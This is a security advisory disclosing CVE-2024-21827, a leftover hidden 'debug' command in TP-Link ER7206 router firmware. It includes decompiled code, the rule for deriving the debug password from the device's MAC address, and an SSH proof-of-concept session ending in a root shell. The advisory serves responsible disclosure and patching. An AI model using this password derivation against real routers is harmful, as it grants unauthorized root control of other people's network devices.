Talos Vulnerability Report

TALOS-2024-1947

Tp-Link ER7206 Omada Gigabit VPN Router cli_server debug leftover debug code vulnerability

June 25, 2024
CVE Number

CVE-2024-21827

SUMMARY

A leftover debug code vulnerability exists in the cli_server debug functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421

PRODUCT URLS

ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-489 - Leftover Debug Code

DETAILS

The ER7206 Omada Gigabit VPN Router is a high-performance networking solution that supports gigabit connectivity, highly secure VPN and integration with Omada SDN for centralized cloud management and zero-touch provisioning.

The ER7206 router has a “Remote Assistance” feature; when it is enabled, it is possible to SSH into the router using the same admin credentials as the web portal.

After logging in over SSH, the user is presented with a router CLI shell:

>help

Commands available:
help                                                 Show available commands
exit                                                 Exit from current mode
enable                                               Turn on privileged commands
disable                                              Turn off privileged commands

The help command prints the commands available to the user, which are limited in functionality. There is also a hidden command called debug; the cli_server’s cli_debug_command function, shown below, is responsible for handling that command:

undefined8 cli_debug_command(undefined8 terminal_related)

{
    [...]
[1] ret = uac_com_get_dev_mac(&LAN_MAC);
    [...]
    error = 0;
[2] snprintf((char *)&mac_plus_admin,0x17,"%02X:%02X:%02X:%02X:%02X:%02Xadmin",
            (ulonglong)LAN_MAC._0_1_,(ulonglong)LAN_MAC._1_1_,(ulonglong)LAN_MAC._2_1_,
            (ulonglong)(byte)LAN_MAC,(ulonglong)local_44._0_1_,(ulonglong)(byte)local_44);
    mac_plus_admin_len = strlen((char *)&mac_plus_admin);
[3] md5_hexdigest(&mac_plus_admin,mac_plus_admin_len,mac_plus_admin_hex_digest,0x20);
    cli_print_no_enter(terminal_related,"Enter your password: ");
    [...]
    idx = 0;
    [...]
    while( true ) {
        [...]
        read_size = read(terminal,terminal_input_one_char,1);
        if (read_size < 0) break;
        input_char = (ulonglong)terminal_input_one_char[0];
        if (read_size == 0) goto check_password;
        if (((-1 < input_char) [...]) && input_char != 0)) {
            if (input_char == '\r') goto check_password;
            if (idx < 0x10) {
                terminal_input[idx] = terminal_input_one_char[0];
                idx = (longlong)((int)idx + 1);
            }
            else {
                error = -1;
            }
        }
    }
    [...]
check_password:
    if (error != -1) {
        if (error != 0) {
            return 0;
        }
[4]     is_eq = strncmp(mac_plus_admin_hex_digest,terminal_input,0x10);
        if (is_eq == 0) {
[5]         system_shell_wrap();
            return 0;
        }
    }
    [...]
}

This functionality asks for a password; if the password is correct, the user is granted a full Linux shell.

At [1], the LAN MAC address of the device is fetched; at [2], it is used to compose the <LAN_MAC>admin string. At [3] the MD5 of the composed string is calculated, and at [4] the first 16 bytes of the MD5 hex digest are compared with the provided password. If the two are equal, the code at [5] is reached, where the system_shell_wrap function is called, granting the user a full Linux shell.

Exploit Proof of Concept

The first thing to do is to enable “Remote Assistance” in the web portal; after that, it is possible to SSH into the router:

ssh -oHostKeyAlgorithms=+ssh-rsa -oKexAlgorithms=diffie-hellman-group14-sha1 POC@192.168.0.1  
POC@192.168.0.1's password: 

>help

Commands available:
help                                                 Show available commands
exit                                                 Exit from current mode
enable                                               Turn on privileged commands
disable                                              Turn off privileged commands

The CLI console offers a limited number of commands. If the hidden command debug is entered, the CLI asks for a password:

>debug
Enter your password: 

BusyBox v1.22.1 (2024-01-16 18:32:23 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

_______                     ________        __
|       |.-----.-----.-----.|  |  |  |.----.|  |_
|   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
|_______||   __|_____|__|__||________||__|  |____|
        |__| W I R E L E S S   F R E E D O M
-----------------------------------------------------
BARRIER BREAKER (Barrier Breaker, unknown)
-----------------------------------------------------
* 1/2 oz Galliano         Pour all ingredients into
* 4 oz cold Coffee        an irish coffee mug filled
* 1 1/2 oz Dark Rum       with crushed ice. Stir.
* 2 tsp. Creme de Cacao
-----------------------------------------------------
root@ER7206:/#

If the password is correct, the user obtains a full Linux shell.

VENDOR RESPONSE

The vendor provided a fix at: https://www.tp-link.com/en/support/download/er7206/v1/#Firmware

TIMELINE

2024-02-21 - Vendor Disclosure
2024-06-20 - Vendor Patch Release
2024-06-25 - Public Release

Credit

Discovered by the Vulnerability Discovery and Research team of Cisco Talos.